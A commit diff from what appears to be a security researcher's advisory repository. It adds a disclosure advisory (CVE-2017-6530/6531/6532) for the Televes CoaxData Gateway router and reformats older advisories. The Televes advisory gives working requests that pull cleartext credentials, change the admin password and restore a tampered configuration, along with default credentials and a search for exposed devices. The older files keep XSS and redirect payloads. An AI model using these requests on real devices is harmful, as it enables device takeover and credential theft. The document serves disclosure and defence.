Adding Televes and changing format

pandujar · Jul 20, 2017 · 151ea1e · 151ea1e
1 parent 495d11e
commit 151ea1e
Show file tree

Hide file tree

Showing 7 changed files with 377 additions and 20 deletions.
diff --git a/CM3.AcoraCMS.v6.txt b/CM3.AcoraCMS.v6.txt
@@ -21,7 +21,7 @@ AcoraCMS is widely used accross Austalian IT companies, Banks and government web
 AcoraCMS, v6.0.6/1a, v6.0.2/1a, v5.5.7/12b, v5.5.0/1b-p1  (and probably others), are prone to several security issues as described below;
 
 
-.: [ ISSUE #1 }:.
+.: [ ISSUE #1 ] :.
 
 Name: Reflected Cross Site Scripting
 Severity: Medium 
@@ -38,7 +38,7 @@ Example:
 /AcoraCMS/Admin/login/default.asp?url="</form><META HTTP-EQUIV=Refresh CONTENT="0; URL=http://www.google.es">
 
 
-.: [ ISSUE #2 }:.
+.: [ ISSUE #2 ] :.
 
 Name: URL Redirect
 Severity Medium
@@ -51,15 +51,15 @@ Example:
 /AcoraCMS/track.aspx?m=1&l=//www.google.es
 
 
-.: [ ISSUE #3 }:.
+.: [ ISSUE #3 ] :.
 
 Name: Username and password sent in clear text
 Severity: Medium
 
 Authentication credentials (username and password) and session cookies are unencrypted.
 
 
-.: [ ISSUE #4 }:.
+.: [ ISSUE #4 ] :.
 
 Name: Cookie Lack of Hardening
 Severity: Low
@@ -68,7 +68,7 @@ CVE: CVE-2013-4724 & CVE-2013-4725
 Cookies are not hardened using HttpOnly or Secure flags.
 
 
-.: [ ISSUE #5 }:.
+.: [ ISSUE #5 ] :.
 
 Name: XSRF
 Severity: Low
@@ -77,7 +77,7 @@ CVE: CVE-2013-4726
 The application lacks controls to prevent Cross Site Request Forgery. 
 
 
-.: [ ISSUE #6 }:.
+.: [ ISSUE #6 ] :.
 
 Name: Information Leaks
 Severity: Low

diff --git a/CiscoIronPort.7.1-XSS.txt b/CiscoIronPort.7.1-XSS.txt
@@ -23,7 +23,7 @@ Cisco IronPort Security Management Appliance M170 v7.9.1-030 (and probably other
 as described below;
 
 
-.: [ ISSUE #1 }:.
+.: [ ISSUE #1 ] :.
 
 Name: Reflected Cross Site Scripting
 Severity: Low 
@@ -35,7 +35,7 @@ description contains user unvalidated input from the request:
 ** PoC removed as requested by Cisco. **
 
 
-.: [ ISSUE #2 }:.
+.: [ ISSUE #2 ] :.
 
 Name: Stored Cross Site Scripting
 Severity: Medium
@@ -47,7 +47,7 @@ printed unscapped on job_name, old_job_name, job_type, appliance_lists and confi
 ** PoC removed as requested by Cisco. **
 
 
-.: [ ISSUE #3 }:.
+.: [ ISSUE #3 ] :.
 
 Name: CSRF Token is not used
 Severity: Low
@@ -60,7 +60,7 @@ of the application, we got no error even when completely removing the parameter
 
 See: http://tools.cisco.com/security/center/viewAlert.x?alertId=29844
 
-.: [ ISSUE #4 }:.
+.: [ ISSUE #4 ] :.
 
 Name: Lack of password obfuscation
 Severity: Low

diff --git a/DS3.AuthServer.txt b/DS3.AuthServer.txt
@@ -21,7 +21,7 @@ DS3 Authentication Server (unknown version) is prone to several security
 issues as described below;
 
 
-.: [ ISSUE #1 }:.
+.: [ ISSUE #1 ] :.
 
 Name: Command execution
 Severity: High
@@ -79,7 +79,7 @@ Successful connection to -;uname on port -a</TEXTAREA>
 
 
 
-.: [ ISSUE #2 }:.
+.: [ ISSUE #2 ] :.
 
 Name: Physical Path Disclosure
 Severity: Low
@@ -127,7 +127,7 @@ line #9
 
 
 
-.: [ ISSUE #3 }:.
+.: [ ISSUE #3 ] :.
 
 Name: User Controlable Error Message
 Severity: Low

diff --git a/Imperva-SecureSphere.OptMgr.txt b/Imperva-SecureSphere.OptMgr.txt
@@ -23,7 +23,7 @@ Imperva SecureSphere Operations Manager version 9.0.0.5 Enterprise Edition and p
 as described below;
 
 
-.: [ ISSUE #1 }:.
+.: [ ISSUE #1 ] :.
 
 Name: Autocomplete atribute not disabled in login page
 Severity: Low
@@ -41,7 +41,7 @@ AUTOCOMPLETE is not disabled on the /secsphLogin.jsp page. This prevents the web
 <input size=30 type='password' name='j_password' style="width:172px"/>
 
 
-.: [ ISSUE #2 }:.
+.: [ ISSUE #2 ] :.
 
 Name: Sensitive information is passed as parameter in URL
 Severity: Low
@@ -58,7 +58,7 @@ GET /SecureSphere/j_acegi_security_check?j_password=5352023200062562773&j_userna
 
 
 
-.: [ ISSUE #3 }:.
+.: [ ISSUE #3 ] :.
 
 Name: Physical Path Disclosure
 Severity: Low
@@ -84,7 +84,7 @@ See also ISSUE #4, where additional file path disclosure occurs.
 
 
 
-.: [ ISSUE #4 }:.
+.: [ ISSUE #4 ] :.
 
 Name: Insufficients checks on file upload
 Severity: High
@@ -146,7 +146,7 @@ An error occurred while importing keys: Failed to load PEM key from &#039;/var/t
 
 
 
-.: [ ISSUE #5 }:.
+.: [ ISSUE #5 ] :.
 
 Name: Insufficients checks on Action Set (OS command) 
 Severity: High

diff --git a/Televes_CoaxData_Gateway_en.txt b/Televes_CoaxData_Gateway_en.txt
@@ -0,0 +1,178 @@
+          ===============================
+                   - Advisory -
+          ===============================
+
+  Tittle:   Televes COAXDATA GATEWAY 1Gbps - Priv Escalation
+    Risk:   High
+    Date:   19.Jul.2017
+  Author:   Pedro Andujar (Tarlogic)
+ Twitter:   @pandujar
+
+
+
+.: [ INTRO ] :.
+
+Televes COAXDATA GATEWAY 1Gbps it is a router+WiFI device used by both, end-user and professional Internet Services 
+providers. According to the manufacturer:
+
+"The CoaxData system enables the use of coaxial, PLC or fibre optics networks to distribute Internet services 
+to a certain number of points, providing a non-invasive distribution system that preserves the quality of the transmission.
+
+CoaxData Home WiFi (ref. 769301) transforms the data signal distributed by the coaxial system in a wireless signal 
+through an Ethernet interface gateway or "Low Power WiFi". Also it can be configured as a router and/ or Access Point."
+
+This device is widely used by WiMAX providers, Rural Internet access, etc ... mostly in Spain,
+Austria and Portugal..
+
+
+.: [ TECHNICAL DESCRIPTION ] :.
+
+Televes COAXDATA gateway contains two default users, (Admin) to manage the device using either Web or ssh, and 
+a restricted one (username) with access to more basic features (local network only and WiFi).
+
+Several ways have been identified that allow the restricted user to acquire or modify the password of the Administrator, 
+obtaining therefore access to the rest of credentials and being able to get root access to the underlying operating system 
+BusyBox, from where you can take full control of the device.
+
+It has been proven that a large number of these devices are exposed on the internet, and they only change the administrator 
+password, leaving by default the restricted account (username / 123456), which allows with the issues described here, to gain 
+full control of the device and allowing access to other devices of the subdyacent internal network.
+
+https://www.censys.io/ipv4?q=Televes+CoaxData+Wifi
+
+Ref.769301 CoaxData 1Gbps-HDTV Coax+Wifi
+doc-wifi-hgw_v1.02.0014 2016-02-02-14:01 - CD Firmware Version 4.20
+
+
+.: [ ISSUE #1 ]:.
+
+Name: Backup Containing cleartext credentials is accessible by restricted user
+Severity: High
+CVE: CVE-2017-6532
+
+This issue is in fact two, first one related to the lack of encryption when storing the user provided credentials wthin the 
+configuration file, second one regarding the lack of access control to the backup file that should be restricted to admin user. 
+This way after logging in with the default "username" credentials, you will only need to access the URL shown below, in order to 
+find cleartext users and passwords of WiFI, WPS pin value, WAN (internet provider) and the device Admin account:
+
+pandujar@fogheaven:~$ curl http://192.168.2.1/mib.db | grep -i Password
+
+InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d Changeme1 (Admin password)
+InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANPPPConnection.1.Password -m 1 -d Changeme2 (ISP Password)
+InternetGatewayDevice.X_ATH-COM_Account.UserPassword -m 1 -d 123456 (username password)
+
+
+.: [ ISSUE #2 ]:.
+
+Name: Arbitrary password change
+Severity: High
+CVE: CVE-2017-6530
+
+This is once more related insufficient access control and checks performed on the client side. Once logged in as the restricted user, 
+we can modify the Admin user password using the following request:
+
+http://192.168.2.1/password.shtml?DeviceInfo.X_ATH-COM_TeleComAccount.Password=hax0rcito
+
+In fact, the password change form, actually allows to modify any other property of the device configuration, for instance it would also 
+allow to Enable SNMP:
+
+http://192.168.2.1/password.shtml?DoCSnmpAgent.Enable=1
+
+
+.: [ ISSUE #3 ]:.
+
+Name: Unrestricted backup restore
+Severity: High
+CVE: CVE-2017-6531
+
+The restoring backup and restart features lacks of access control, so the restricted user could modify the configuration 
+by setting the credentials of his choice taking advantate of this functionality:
+
+POST /ReadFile.cgi HTTP/1.1
+Host: 192.168.2.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.2.1/resetrouter.shtml?DeviceInfo.AdditionalConfigVersion=default_cfg_v1.02.0014
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: multipart/form-data; boundary=---------------------------66789582480853432558488077
+Content-Length: 42533
+
+-----------------------------66789582480853432558488077
+Content-Disposition: form-data; name="cfgfile"; filename="s"
+Content-Type: application/octet-stream
+
+InternetGatewayDevice.DeviceInfo.X_ATH-COM_TeleComAccount.Password -m 1 -d !dSR4ever
+
+
+-----------------------------66789582480853432558488077
+Content-Disposition: form-data; name="LoadCfgFile"
+
+Load
+-----------------------------66789582480853432558488077--
+
+Then performing the following request:
+
+http://192.168.2.1/result.shtml?method=LoadCfgFile&result=0&cfgfile=/tmp/s1488261988
+
+And finally rebooting the device:
+
+http://192.168.2.1/result.shtml?method=Reboot
+
+
+.: [ ISSUE #4 ]:.
+
+Name: Credentials sent by querystring
+Severity: Low
+
+Both, when logging in and changing password, credentials are passed through GET request (querystring), therefore they are cached 
+in the browsing history causing them to potentially been revealed by accident:
+
+http://192.168.2.1/login?username=Admin&password=XXxXXXXxxX
+
+
+.: [ ISSUE #5 ]:.
+
+Name: Weak session mechanism, based on source ip
+Severity: Medium
+
+After performing the authentication process no token or cookies are assigned to the client browser, but the server would recognize the user based
+to its source ip address. With this mechanism, if a user is authenticated through internet, anyone who shares his browsing ip (ex: corporate proxies), 
+would has access to the device with the very same account of the legitimate user.
+
+
+.: [ CHANGELOG ] :.
+
+  * 19/Feb/2017:   - Vulns found.
+  * 27/Feb/2017:   - Manufacturer contacted through their contact web-form.
+  * 28/Feb/2017:   - Technical details sent on a 2nd contact attempt. 
+  * 01/Mar/2017:   - Manufacturer acknowledge the issues and stats that restricted user would be removed from future releases.
+  * 13/Jul/2017:   - Follow up email related to resolution. No response.
+  * 20/Jul/2017:   - Public Disclosure.
+
+
+.: [ SOLUTIONS ] :.
+
+It is recommended as a preventive measure to change the user name and password of the restricted user that comes by default, in addition to
+block the administration web interface and SSH on the internet or untrusted networks.
+
+
+.: [ REFERENCES ] :.
+
+   [+] COAXDATA GATEWAY 1Gbps
+    http://www.televes.es/en/catalogo/producto/coaxdata-gateway-1gbps
+
+   [+] Televes About US
+    http://www.televes.es/en/empresa/aboutus
+
+   [+] Tarlogic Security S.L.
+    http://www.tarlogic.com/
+
+
+
+
+
+
+                    -=EOF=-
+